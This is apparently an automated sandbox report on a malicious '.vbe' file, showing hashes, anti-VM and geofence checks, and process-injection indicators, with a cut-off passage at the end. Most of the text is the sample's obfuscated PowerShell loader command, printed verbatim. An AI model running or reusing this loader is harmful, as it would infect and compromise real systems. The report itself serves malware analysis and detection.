e25001f14ef2d87f8bea36b5b0c9313c2c6913816feea51ec2db3eeee8f2e55e

General

Target

#120622.vbe
Size

607KB
MD5

3c662f629657c3d9a0a0b20d032af5b0
SHA1

147be1e2dcd1dd7c79347a1981e930959f26f8fb
SHA256

e25001f14ef2d87f8bea36b5b0c9313c2c6913816feea51ec2db3eeee8f2e55e
SHA512

8008e3890754faaacd9c2bf820e6fa9a4c2e90f052d239216bed0e1714b82475aad194597f1bb2563e91ddddb8d512cd978a1764f8cd27253475b616c18cb7a5
SSDEEP

12288:VWRysGD3danxlBpILdimtkYjveEg3V6FqtvEb:VmDENKcB3KEvwtvEb

Score

7^/10

Malware Config

Signatures

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4480	powershell.exe
4660	caspol.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4480 set thread context of 4660	4480	powershell.exe	92

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4920	powershell.exe
4920	powershell.exe
3556	powershell.exe
3556	powershell.exe
4480	powershell.exe
4480	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4480	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4920	powershell.exe
Token: SeDebugPrivilege	3556	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1784 wrote to memory of 4920	1784	WScript.exe	81
PID 1784 wrote to memory of 4920	1784	WScript.exe	81
PID 4920 wrote to memory of 3556	4920	powershell.exe	83
PID 4920 wrote to memory of 3556	4920	powershell.exe	83
PID 4920 wrote to memory of 3556	4920	powershell.exe	83
PID 3556 wrote to memory of 4480	3556	powershell.exe	85
PID 3556 wrote to memory of 4480	3556	powershell.exe	85
PID 3556 wrote to memory of 4480	3556	powershell.exe	85
PID 4480 wrote to memory of 4660	4480	powershell.exe	92
PID 4480 wrote to memory of 4660	4480	powershell.exe	92
PID 4480 wrote to memory of 4660	4480	powershell.exe	92
PID 4480 wrote to memory of 4660	4480	powershell.exe	92

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\#120622.vbe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjulpiskers = """CoFTruPrnDicAdtJuiStoExnMe DiHBiTTeBCo Hj{In Ja Un Ea KlpPsaovrHuaBlmVe(Tr[AsSGltCorUaiTenUngMo]Ko`$CoGMaoDedKutDeeAfdViesnsit)Op;Pe Ra Un Wo Pa`$SoSsahBriEcpSjpAsiHyningPrsRe Bl=re ArNBlerewWh-MiORebPajSpeTicRotPe ClbStySutniePa[Ha]cl ug(Ko`$WaGEcoBadOutHeeHudSoeAfsKa.FlLSpeAgnCagSutErhCi Ud/Po Ve2In)Fr;Bo Ir Re Af VaFcooUdrAs(Un`$DiMPaoInmKosPafHjrpiimo=Ar0Tj;Af Cu`$ReMHooLimThsfofQurJaiKi In-molCotFr Ta`$KoGLloScdVstFiePadLseGesUn.BaLNyeEsnVigGotSahCo;Ki Se`$KuMTeoJomKosAmfelrDoiAn+ka=Br2sp)Kl{Fa Va Du sa Un do Ur Uh Si`$TrSMehnoiDipNbpgaivenDrgHasBr[Fe`$brMPaoShmBasorfOvrCoiSc/Pa2Sh]Bi Pl=Km Un[SkcEgoAlnHjvNeeunrSptCy]Sw:sv:DiTkoodaBStyFotReeOr(Ba`$AmGhioVedTetSteFodbieHesby.SlSKauHobKesBotRerStiMenNogwa(Gl`$AfMSpoPamtrsFrfPrrZoiHe,Fi Ta2br)Af,Me sp1Fr6Mi)Re;An Ps Me`$PoSKahLoiKopAnpLeiPenPagJosSi[Br`$OlMAuoSlmGusBefTrrShiAl/Ma2Ps]Or Be=Ya Ga(Re`$AfSNihUniTipOvpbeiDenelgfesSp[Sa`$UdMDeoBlmMosLefBerboiMe/Ya2Tr]in Am-FabRexAroErrCo Of4Tj8Sa)Ud;Bi Op Op Or Br}Po Sy[SaSKitGlrFiiNonFugSm]Wa[LaSOvyMesAvtMaeVamde.MoTSleDixCttHo.BiEHenPicNooCydDaiNonMegOv]Ge:Ru:FrATeSNeCDiISkISp.SlGSpeBatLeSImtPerPriKlnEkgUd(Wi`$HvSExhOviOvpPrpMeiUnnAkgMisKe)Bu;Te}Fo`$AmPNoiAblFooDatSkedirDiiAfnBagBrsNe0Pa=ErHTrTTrBNi Ar'To6Kn3Sp4Sp9Se4Sl3Ng4Qu4Bl5Ko5Ta5SpDHo1StEHe5bu4Ar5trCIn5FeCUn'pe;Ov`$FoPBeiDelLioDutFoeKerStiPenKlgAfsLa1Kn=HjHOvTsuBCa Un'Ab7MiDBe5Ov9Sa5Sl3Az4Ur2Al5SkFTh4Ke3Ra5TuFEk5Hi6so4Pe4Ma1BiERe6Un7Fu5Un9Da5InELu0By3Wi0Re2Ov1LeESp6Ta5Be5PuEMi4No3Tj5pr1Fo5Tr6Un5Ba5Ui7VrEPl5En1Mo4Pa4Pr5Fl9Ra4Ve6Mu5Mi5St7AfDfr5Bl5Se4Ve4Po5Ba8Ga5OeFIn5Pr4Re4Th3Co'Do;Sp`$AnPApiSklBeoAftUneMarMoiPlnAkgacsKr2Fo=RiHHeTOgBLo Vl'Pr7Ca7Fl5ca5uu4Lu4be6Dy0Tr4Un2Ba5TeFSp5Ob3Sk7Sw1No5Fe4Ca5Fa4Si4Ka2Ra5Co5He4Af3Je4Re3Fr'Ph;Si`$FrPTriAnlCuoBatIneCurFriVenTegTisNo3Pa=OmHCoTDiBAb Tr'ps6Ko3Bl4se9Sp4No3Is4Ln4Fu5Sy5Un5VaDVi1NoEBa6Bu2Ma4Pe5Ug5JeEVi4in4Sp5To9Ov5chDPu5Na5Kl1TeEUn7an9Sa5StEVu4Af4Co5Am5Sj4Kn2ta5PrFSc4Di0pa6Ko3Ko5Di5Fa4Ca2sk4Mi6De5Ek9im5Th3li5Pr5As4Un3Ko1ElEfl7Ns8Ga5Ov1Ri5imEDu5Mu4Li5GrCLs5Ge5In6Ca2Ni5No5Jo5Ab6Di'Tr;Un`$ApPOviSalDuoKotFoeNorBriHunSegSesIn4Br=PrHLoTDiBal Ca'Pr4Sk3fa4Je4Sc4Sh2Ad5Sv9Ls5BrEIn5Sv7El'De;Mo`$StPJoimolVaoUgtEjeKorKaiDrnLsgInsCo5Di=VaHStTBrBSp Ka'Ex7No7Ar5Ra5Eb4Pa4Nd7EmDLa5UnFFl5Re4Ph4Me5Pa5TiCPa5Op5Ni7Ta8Up5Dg1Vu5BrEap5He4Ag5MiClo5Eq5pa'Fo;Lo`$VaPlaiFalPaoHjtskeFrrAdiTonAlgUnsPr6Ho=KoHMoTGoBEg af'Ph6Te2Ri6Sp4Ge6Hi3De4Un0Va5La5De5Ca3Ri5Dr9Be5An1Pe5HvCFo7KrEEx5Co1Si5VrDSo5Se5In1KiCaf1Ud0Ti7Ti8se5Va9Li5Ud4h 5De5Su7Ha2Ti4Se9Nr6Or3Se5Gr9Gu5De7Ti1VaCCy1Sf0lo6Di0De4mu5Re5Tv2Er5UnCWi5Sc9Af5In3Ru'Sh;Re`$EyPuciholGeoAvtEkeunrGuiUnnAbgFasHo7ea=JaHKaTMuBSe Be'Dv6No2Ci4Af5Ap5NoEsu4Re4Uf5Hs9Qu5GlDPr5Co5Ud1VaCJo1Sk0Un7KnDBe5Li1Ap5SjEBa5Du1Fa5Ic7In5wi5Ve5Ha4No'Te;Af`$FePHoiWelreoSttOreSkrBeiDenPrgBesCa8Fo=KaHDiTReBRe To'Pr6En2In5Oe5da5In6Ae5ChCIn5An5Ar5Ma3Fa4Us4Gl5Ev5Cr5No4Ny7Kr4He5Mo5Mu5JuCKo5St5Ny5Ur7Be5Sy1Su4Hy4Ud5To5Bu'Ga;Tv`$spPMoiUrlEjoTitNeeCorSkiDenetgVisDe9Ca=coHQuTefBBl Cr'In7is9Ga5AfEPr7RuDPo5Us5Al5CoDSy5MiFha4Ba2le4Ef9Pl7ViDRo5UnFWa5nd4To4Pa5Pi5KkCYe5Be5Fo'Ov;Pa`$ViYVeoUniZicRakBesFa0An=AfHAfTHeBbi So'Lu7UnDFi4Tu9re7Un4to5Sc5De5WiCba5Ac5Be5Po7Ps5Un1Ga4Ul4Ta5ti5Ou6Dr4Ba4sl9Af4Sp0Re5St5Mi'Ru;Wa`$ReYSioPriHocHakKosAs1Ag=JoHRuTInBSk De'He7Ho3hj5InCEk5He1So4Se3Br4St3Sa1ReCKr1Tr0Bi6ti0Or4An5Sp5Ho2Ra5AgCUf5Sk9ho5Gl3Af1ByCMi1va0Sp6De3Ad5Qu5Se5fa1In5GiCFl5Sp5Da5Ka4Re1FoCEn1De0Uh7Cl1Su5ZiEKu4Ls3Ka5Op9Mo7Li3Be5FiCRe5Gu1Ly4Ry3Uv4In3Sa1ThCSk1Al0Pr7Fo1Tr4Ol5Sc4fi4Ma5ArFGo7re3De5LuCGr5So1Co4Fo3Ou4Ic3Gl'Pr;St`$NeYlioFaiMicUnkddsTa2Co=BeHCiTHoBPa Ex'Fa7Fo9in5AsEud4Le6Mi5ObFpo5NoBsm5Se5Ha'Un;un`$BoYSpostiMecSkkGasUn3Af=ReHPrTUrBSn Ka'No6Tr0Ro4Cy5Ne5Su2Mo5ShCfl5Af9St5Be3se1UnCVe1Fe0Op7Ge8Ju5Ri9No5Ba4Sa5Pa5Re7In2ho4Aa9Be6Re3Sc5af9Ri5Po7Sw1OpCEl1Lu0Mi7FlEMe5Ha5Go4Ju7Ne6Tr3Ef5FrCCo5PyFJe4Le4Ny1SaCNa1Or0Sl6Di6Mo5Hu9Sy4mi2Sa4Pr4Ra4To5Tr5De1Tv5ReCCh'St;Mi`$HjYRroBeiRecFrksvsgl4Ru=DoHRkTCeBAn ho'Fr6Gr6Ap5Ba9Ge4Pl2bl4pr4St4Ty5Vo5Ph1St5TrCBo7Fu1As5SnCDu5MeCIn5DuFNo5Sm3Ln'Un;Mo`$SkYdioSuiStcZekinsMo5Re=UdHTrTCeBDo Be'Ro5UnEgl4Or4Gr5Fe4He5svCSw5MoCMe'Nu;be`$SaYGeoShiKucFlkOpsUp6in=HiHPeTReBUd Ma'Ag7MeEAr4In4Fa6Ep0Tr4Dr2Ro5DyFFr4St4Sa5My5Un5La3Lu4Md4ud6An6Co5bo9Co4Sk2Nu4Di4ca4Br5No5Ny1Gu5ToCBe7SuDpa5ut5Di5AlDMi5BiFVo4Ba2Ho4Sq9Se'Ku;Fa`$KtYBeotriDrcfekUdsst7Fa=DeHBuTroBUd Do'Va7Di9Hi7ma5In6Re8Ui'Sa;Bo`$IfYGroBriSucTrkEjsCi8Fo=AuHHeTFuBUd ae'No6MaCDa'Se;BafBauKlnPecHutKliJaoSynLi MifTykTrpTi Er{MaPIsaSarTeaSomAi Va(Ca`$SvTExaSpbDeeBilFaoDipSasRatGoiwolStlPriTrndogudePanOm,Mi Ro`$HvlAtiBytTroTogMirRaaStfOveCorMynVaeNo)Hy Sn Va St Ha Un;Un`$StFPnoAgtHeoMikCoodrpIniNoeCarHoeGa0Ou Re=SpHSuTFoBSp Er'Pr1Ve4Ta7Af2Re5Sa5Fo5Ba1St4Fo2Br5Ju2Mu5Ti5No5BiAPl5Al4su5AlESv5Sl9Co5SkEko5be7Bo5Vi5Ep5OpEBi4No3St1up0Fr0UfDAf1Se0Ke1Tr8Cr6SaBSt7Tr1Sn4Mu0An4Un0Ul7Ur4Te5KvFse5AnDMe5De1Un5Md9Ta5PrEAf6MeDac0ReALu0ArASc7Pr3So4La5An4Sk2Ex4Ch2Ul5Pr5Sa5ReEsk4Sv4Pr7Lo4Tr5OmFFo5MiDRe5Gy1Sh5So9Tl5MaEKn1LiERo7om7Un5Ca5En4st4Si7Sk1Ru4Fa3Co4Ne3Re5In5Ra5ToDSe5Sv2Ru5HvCTr5Te9ap5Wa5Br4Be3Pa1Fr8Sh1Ra9Ha1Up0Di4HeCPo1Re0Dr6Ps7St5sn8Sm5We5Ag4Fi2Po5Af5Bf1KaDRe7HeFRe5In2Pr5WoAUd5Es5Sp5Di3Fo4In4Om1Aa0Ke4InBSc1Le0Gr1na4po6ExFTe1DeESk7re7Ta5HeCBo5KaFIn5rk2St5Ch1ju5KiCPe7Ek1Is4Em3Ba4Op3Fa5Sy5Di5HaDPe5De2Ak5PrCtu4El9ru7Pe3Re5Du1Tr5Sh3Br5Fo8Br5Ko5Ly1Mi0Bi1StDNe7Ka1Po5TeERo5Po4Ma1Ba0Gu1Su4Il6KnFWh1AkEFl7AmCNo5OvFKl5Ca3Sl5Su1Sa4Ew4Cr5Ma9Tr5MoFBl5PhETr1ScEPa6Sp3Sy4Se0Tr5DiCMa5ma9Un4Sm4Id1st8Tr1Su4Me6Fo9Vi5SqFYt5ro9Bu5Sh3Po5HiBDr4Fr3Hy0Gu8Ku1Ca9Sa6GuBDu1peDLi0In1Ge6SoDIc1DiEts7no5Ve4Pr1He4No5Di5Un1Re5WeCBl4af3Re1Ci8en1Po4Im6ho0De5Er9Sk5swCty5BoFmn4Sp4Ko5Ph5Ba4Pa2Sc5ka9Im5PrEUn5Tu7Mo4Ko3De0uf0Ub1En9Te1sv0De4ViDDv1Fl9Es1PrESu7Be7Po5Ou5Mg4Re4Sk6Su4Nv4Po9Ra4Sm0Ka5Sl5sp1In8Hu1As4Kr6Fr0Un5Ov9Ze5FiCSu5OsFLi4Fr4Si5Bu5Me4So2Nu5Mi9Ja5unESk5ro7Py4Pr3Au0fr1Ho1Ob9Sa'An;Am&Ph(Am`$ovYGaoReiFucChkUvsPn7Fo)Kn fo`$VeFNeoUntEnoSlkBioSkpGaiGeeRerkoePu0to;He`$FlFExoPetTyosukDooPupubisdeMarfieKr5Ti Me=ka SiHFiTGlBDr It'An1ko4gi7we2Do5AmFGo4Hy4Do5Ov6Hj5ouCMo4Co9Ne1Do0ba0SpDNe1Hy0Le1Vi4Dn7Ap2Sa5An5ek5De1Bi4Be2fi5Ph2Ma5Se5Po5FoAUd5Pr4Di5ReEOs5Go9Vi5SkEgr5Ko7ma5Re5Sk5foEAf4Cl3Sj1ZyESe7Gu7Re5Se5Aw4Un4Od7KaDOv5Ha5Qu4fo4pr5Mb8mi5SnFEx5An4Se1hj8Ls1Ar4Sp6Ep0Fo5Un9Uh5RmCPa5MiFFo4Zo4Re5Hu5By4Ad2Wa5Aa9Li5KoEIn5Se7Ku4ab3Ch0Un2Un1StCSu1Wh0un6foBSe6Po4Jo4Di9At4Nu0Co5El5An6MeBMe6StDAs6InDKi1Om0Sa7Su0br1Ha8Ah1gy4Du6Da0So5Fo9Ge5PrCTy5GiFGr4Fr4Sl5Fo5Re4Mo2Ka5Kv9So5PeETi5Ul7Gr4Ve3Sn0Ci3Fl1ReCPe1Fr0St1Gl4Tu6Ud0Fo5Un9Di5SkCRe5ShFAn4Fo4Bi5Bl5Do4to2Hy5Im9Ca5LiETa5Ge7Sp4Ne3Sp0be4Mo1Sa9Li1Bi9St'Ko;Re&Ma(Yv`$GoYLooAliKecEakSisHa7Ri)Hi Ml`$SaFFooSytAroBrkExoBapNaiDreKurOvepo5te;ce`$GyFBloVitDaoEkkKooUnpAbiQueCrrPoeTa1Un Kn=Be LoHThTJeBSu Mo'Bl4Kd2Fo5Ap5Ro4Un4ar4pr5Ch4kr2El5BrEPy1Se0No1St4Be7Ch2Sv5RaFTr4Sk4St5Re6Ti5UfCEx4Kl9st1UnEMe7Zi9ca5TuEBo4Sk6Ro5TaFAl5JuBto5Ta5Ut1Bi8Ab1Lb4Ph5GeEPr4Pe5St5DrCso5OpCSt1SaCSt1fa0In7sa0Cl1Ma8Po6BrBQu6Ok3Ha4wo9Ch4Co3Fe4Th4Af5No5Ox5RoDFu1DyEAv6Pr2Fa4ma5Ra5DeERe4Va4fl5Li9rd5BrDAn5Re5Hu1SjEFo7Ha9Vi5JuEgu4Ch4Tg5Ga5Go4Fr2Re5TeFEk4Br0Un6Vo3Tr5Sy5Ka4Bo2Ul4Pe6Gr5St9Mo5Xy3En5De5Rh4Sp3Po1TeEFo7Ga8Fr5Mi1to5ClEGe5Yn4Ji5MiCAf5Bh5Mi6Ma2in5Ro5es5Ln6Pi6JoDDi1Tu8Ru7CiESu5he5Dr4Be7Bo1KrDba7AnFMa5On2Co5SnAUn5Fo5Va5Be3Co4Sa4In1Vi0Ku6Fn3Nu4Su9Bi4un3Pr4Wa4Pa5No5fr5BoDKa1ByEDr6Un2Fo4Pn5Pr5EmEet4Kn4Li5Tr9Fr5PaDsn5Bl5Se1FoEIn7St9Un5CiESa4Op4Ca5Fl5Si4St2Fa5MeFPa4Sc0St6Fo3de5ti5ce4Ac2De4sp6Re5Kr9Na5Dr3Vo5Fr5Cr4Be3Di1ByEFo7Os8Wa5Co1lb5PaEsk5ha4Re5WiCPr5De5Sa6Am2Ek5Kn5Un5Pr6Ou1Ra8Bu1Be8Un7DeEKa5Ul5Le4ti7Gr1DaDDi7enFca5st2In5UlAFa5En5hy5Va3Pr4Fo4Co1La0Af7Vi9Ru5UpENe4Co4Un6Va0Sv4Gu4Pa4Ho2Bo1Un9So1SpCSt1Jo0Me1Pr8Ha1Un4Gr7Gr2Bi5Al5Ch5St1Sk4Ko2Vo5Se2An5Ag5Ho5StAFo5no4Ri5UfETe5Di9Ac5toEUn5Un7St5Da5to5EnEBe4So3Se1MoEPs7ra7Zo5Un5pr4Ap4Ko7MeDUn5Un5Sl4Si4An5Ru8Om5AaFRe5ni4La1ti8Sa1Tr4Af6Es0Ka5Ge9on5PhCPe5ToFsy4Ba4Pi5Br5Un4An2Ka5Ls9An5SkEHi5Go7ro4At3Sa0pr5Be1Jo9Be1Co9Br1AtESu7So9An5FiEPu4Co6In5KeFop5AlBBa5Fe5cu1Pa8ta1St4Pr5KaEEu4ap5Ua5EnCLe5FoCMo1UnCWi1Sk0An7Ra0Mi1Ov8Ne1Pr4Sa6As4ta5Rd1in5Ud2Tu5By5Un5NuCHa5CoFSe4Se0Im4Re3Sm4Ka4He5id9Xa5BaCMy5AfCIn5Un9Tr5CoECr5Li7Zo5Bi5Ph5DeEBo1Im9Ba1Il9So1Wi9En1Qu9No1SoCGn1Pl0Hy1Ha4To5PrCli5Ma9cr4Bl4Tv5BaFDe5Pr7St4re2Ev5No1Tr5Bi6Mo5He5Br4In2Te5SeEKo5Li5ca1Fy9Fo1Su9Bu'Ad;De&In(Un`$ShYPyoKeiHecEpkStsIn7Bi)Am Rh`$ToFanoCitraoAtkBuoAjpGiiOvenerBeeCl1Po;sa}DafPauVinUdcIntfeimaoAunSt DeGDyDStTso To{AfPSkaAnrReaUnmPo Je(Be[CoPTraBrrafaShmCreCotOpedirop(SaPNooBesNaisatDiiBeoTrnDe Sp=Re Mi0He,In HoMOfaVonQudSpaSmtDioShrSeyVa un=My Sv`$PoTThrshuFaeBi)Io]Re ne[BjTAnyempPoeSl[Si]Ja]ca Un`$OuHGeysvpNieSurPrsSweVaxHiuDiasklGr,To[RePLaaLarPoagrmDreBltSkeLarUn(RePreoPlsTeiSltAqiBjoMinUn Si=ch Qu1Fr)Un]Pu Ef[ReTPoySapSeead]Sm Pr`$BlTBroPowhabGaoPraRutAn Un=Xe oc[goVChoBaiRedSu]Kr)Pa;Fr`$LiFGaoCatCooLikDyoBepCaiIteLirBeePa2Ex Un=Fe CeHInTJoBTa Su'Dv1Re4St6Br3Ap5Pi8Da5Ko5um5Es5Ch4Un4Re5Bu1Fr5Fi7Pi5rk5Et1Do0Ba0HiDEk1Ge0Me6BiBDo7Le1Ph4Bo0Pe4An0Ko7Ko4in5LyFKo5PoDPa5Pr1Af5Ag9An5AfEJu6PiDGa0MeARe0SaAFo7Zi3De4Un5Ab4De2Pr4Ph2Sc5Ki5Di5TeEOr4Un4Un7Kv4Me5LoFSo5TyDEl5Yo1Sk5Ru9Re5keEPa1BrEFe7Is4Re5Ph5Ba5Le6ti5St9bl5SkEEn5Te5So7Lu4De4Ge9Fe5ApENe5Ao1Ph5ZiDAg5Pr9Ar5Da3Fr7Mi1Th4Li3Rd4Re3Fi5dr5Se5AmDLe5Un2Tv5ArCIn4Un9Th1ka8Be1Co8Aa7BrEKo5Cz5Ud4Go7Jo1RoDSt7akFno5Al2La5OmASa5Gr5Ma5Pr3Af4At4Ex1Li0Fi6Vu3Ne4Lu9or4Ca3Fo4af4Ac5Li5Sk5grDIn1HoECl6De2Ch5Pa5Pe5Be6Un5KoCSu5Ka5Ne5St3Fr4Ma4Bu5ro9Pr5inFMe5UdELe1SmEFi7Sl1Lu4un3No4Di3Fo5Af5Ri5doDan5Sp2br5NaCSn4Tm9Ri7VeEet5Id1Al5NdDSu5St5Pi1Sp8Tr1Au4Si6Be0Sa5Cn9Co5BeCMo5LrFLa4De4Op5Hj5Pr4Ka2Po5Un9Bu5PsEBr5In7Ne4st3Ud0Ma8Ba1Ro9Fo1St9Pr1PrCAr1An0Ma6SuBCe6Sl3Pa4Ov9Du4Th3In4Li4Un5si5Sp5idDbr1CaECo6Ob2Ma5Sp5Jo5Pl6Sv5HyCHa5Sv5se5Dy3Ui4Mu4Op5Ca9Os5MaFDi5ElESk1DaEPe7Fi5Ar5ClDPa5Af9In4qu4De1RaEFo7Pa1Kr4Op3Be4Pl3Vu5Sk5Ba5MeDNo5Un2ha5FoCUn4Tm9ka7Pn2Ja4Ru5Fr5He9fi5SkCKl5Re4Ml5An5Su4st2Ta7Fo1Su5Hy3Di5st3Co5Ek5Tr4Pe3Ex4Em3Re6TaDBa0doAKl0noARe6Dr2Hy4Qu5Ap5FoEJo1Ad9Me1OpEMu7La4De5An5Pa5Tu6Pi5Ch9Kv5agEan5Ba5No7Mi4To4Te9Pl5MyEDi5Fo1Ni5TaDSt5Md9kr5Pr3Ir7EnDSc5FlFGe5Su4Gi4My5Le5VaCNa5ca5Hi1op8Lo1In4Va6Ak0Ma5Mo9In5SyCdu5ZoFda4Un4Sr5No5Gl4An2St5Ho9Fr5EgESk5Pa7br4Ko3Vi0Da9Un1AlCAk1Tu0Av1Al4Un5Ph6se5Mu1Mi5NrCKa4Sn3Tr5lu5Pr1Va9Kv1HuEHe7Mo4Di5Sk5Hi5Al6To5Th9Hu5ElEKu5Tr5Dr6Se4Re4Ov9Os4Sy0Al5Bo5Bi1Hy8Al1Tr4Sp6Da9lo5BaFMa5sk9Fr5Sk3Br5SkBAr4So3Ry0By0Ri1NiCsw1St0Re1Ki4At6Th9Ya5StFUn5Ko9Da5Di3Qu5YdBRa4Sf3Kn0Ai1Ch1KlCBl1hy0Lo6MuBPe6Pr3Si4So9Re4Bl3Fi4El4Ud5Un5Tu5stDFl1veEFu7BoDPr4Be5bu5FoCKo4Fr4In5Ke9Se5de3In5ca1Go4pr3Tr4Bo4Di7Lo4Su5St5Dy5SmCAf5Em5Va5Kn7Ba5Me1Ca4Im4Ma5Fo5Sk6RkDEg1No9At'Fo;Uf&Sp(Ba`$boYVeoPhiEuchukKasNe7Ac)Bu Fe`$SkFSnoPstLiorekRaoSepStiDreMorBaePr2Dr;Be`$SaFFloditUroprkKooInpTriSpePorKoesa3Fr po=Aa DrHDeTBoBEn Je'Ma1Ka4Ti6An3Bu5La8ur5Ri5Pr5Op5Sy4Oo4sc5ha1Ve5Ug7pe5Kl5no1HaEfo7Or4tr5Sk5Pr5Hj6In5In9Mi5LaEMe5St5Tr7Bi3At5AtFBa5HuEEr4An3Ve4Sk4He4Br2Ly4Un5Ka5Ba3Kn4Ta4no5AmFPr4Br2Ch1Da8Ma1Bh4Sj6Ki0Pl5Af9Th5AnCSe5RiFLi4Om4Ap5St5Di4Sh2Dr5Un9Sw5CaEst5Po7Sp4Tr3Va0Fa6Bo1BaCBo1Ae0Va6SeBTi6Ti3Sm4Ex9rg4je3Un4Tr4Gu5Op5Ob5BaDCo1InEre6Sm2Ha5Jo5Pe5St6Po5PoCDo5Su5Sn5So3Fr4De4Mu5St9Di5MaFIn5GyESw1AnELe7de3Be5Fi1Ov5HiCMo5PaCAp5Sk9Ov5HeEMe5rg7Sc7Py3Gr5BaFBl5WiELi4Br6de5Mu5Hi5ChEUn4us4ho5Se9Ma5KlFSt5ToEGl4Id3Or6PuDPa0FeAIn0CyAPl6my3Ud4St4Cl5De1Ra5ElEsv5Ni4Pi5He1Hu4Fo2Ud5In4Om1CaCBe1Ad0La1Vi4St7Sh8Fu4Fo9Gr4Fa0Un5In5Ru4Lo2Ov4Aa3sa5El5st4Sc8Bi4Fo5Sk5Sk1Fl5KrCMu1Ja9hu1PoECa6Pr3Sv5Sc5Do4St4pr7Ey9Ps5fuDOv4Sp0Sn5SyCLi5Gy5Ti5DiDKo5Ch5Bl5MaEMa4pl4Fe5Un1st4Tr4pl5Pe9Sk5ReFUd5InESn7Ap6Of5ThCCu5Ud1Gu5mi7ac4Ox3Ci1Fr8Ch1Re4Ar6Pr0Sn5Ka9Pe5PaCPr5ArFHo4Ni4Nu5Af5Ti4pa2Co5Gi9Un5ViEId5Af7le4Bi3Ho0Fl7To1Op9Ca'De;pr&Io(Ta`$LaYAdoEniStcDokUnsTe7Iw)Se Gr`$CoFPioaatInoNokNaoSkpSlipieUnrWheBi3In;in`$SyFbvoArtopoUdkUuoInpVaiBoeOvrFaeKu4un eu=si BaHTaTHeBPr Ra'Se1Bu4Ko6Ph3Sl5Un8Pr5Rh5Fi5gr5Ko4Tr4Pr5ne1eq5Fa7Po5Ap5Ge1MeEMo7Fr4st5Bi5mo5Ge6Fo5Pr9My5PhEPr5bl5Fy7SaDBa5In5St4Fo4Er5No8Bl5SkFSc5Th4Os1Hu8Se1sv4Ca6Ba9Os5PiFBi5Te9Fe5Dr3Pe5UnBPr4Sl3Co0Gr2Bo1TrCUn1Ry0hf1mi4De6ud9Ge5TrFLa5Fo9Be5Su3Gr5BaBUn4Ro3me0Ha3Tr1TaCUn1Va0ar1Au4tr6Ti4sv5ReFRd4Dy7Ca5Kr2Ga5TeFWr5Co1cr4fl4Ak1PoCFo1Ba0Un1Sh4Af7El8Ha4Ud9se4So0my5Ja5Hk4In2pa4Pr3ge5Ge5Ar4Sn8Al4Rv5Le5Ur1Ja5HeCFl1Ba9fa1AbEVo6Ph3Ta5St5Ho4Ch4Mi7Af9Pi5FuDEj4As0Ha5DaCPh5ra5St5snDSe5Br5Un5DdEMo4Tu4De5To1Er4At4An5tr9La5SuFtr5ToEfo7Ka6De5ViCre5Bu1En5Fa7Ar4Su3Ra1Li8Pa1ef4Co6Ta0Fa5Un9Fl5CrCAn5KoFst4Jo4So5Op5Ej4Mu2Ko5Ad9Re5YdEFd5Te7Re4Ov3Pr0mi7Cu1un9Fa'kv;Md&Ma(Is`$StYAloCeiBlcFokVisst7Vu)Be Fl`$StFGooUntPhoSekNaoAfpHeiSeeKnrKaeoe4Ov;Gw`$PoFAnoRhtLroFrkBaoWipSaiSleMarOpeRi5lv Up=Gu UnHSpTjuBPh Pr'Ma4Cl2Tu5pl5Ex4Do4Ga4af5Sl4El2No5HjEPr1Ri0Il1Tr4Fi6Bl3So5Sa8Fa5su5So5Pl5Fa4Be4Ud5Sv1co5Ba7Po5ch5Ba1ReELa7Hi3Ho4Af2Oc5Mi5Be5Ad1Ti4wu4Ar5Hi5Ra6bu4Ly4Ra9Ko4Sa0St5El5Ci1Me8An1Ul9An'Li;Ti&Ov(Ag`$KoYPioPeifrczokZisMa7Pr)Fl Br`$DeFWaoSptChoUdkSpoPrpBliTueakrigePa5Su Tr Sk Va;Ub}Mo`$AfDRerImaRewMibBeavecSukSk Di=Mi FlHsuTSuBLu My'Da5PrBEx5Bo5St4Se2Tr5AnEDi5Dr5Lu5TeCOu0ul3pa0Br2Sy'Te;Fr`$InFTaoKattaoTakRgoAnpNiiPreAfrRueTr6Sa In=Ba AdHLvTVeBSn 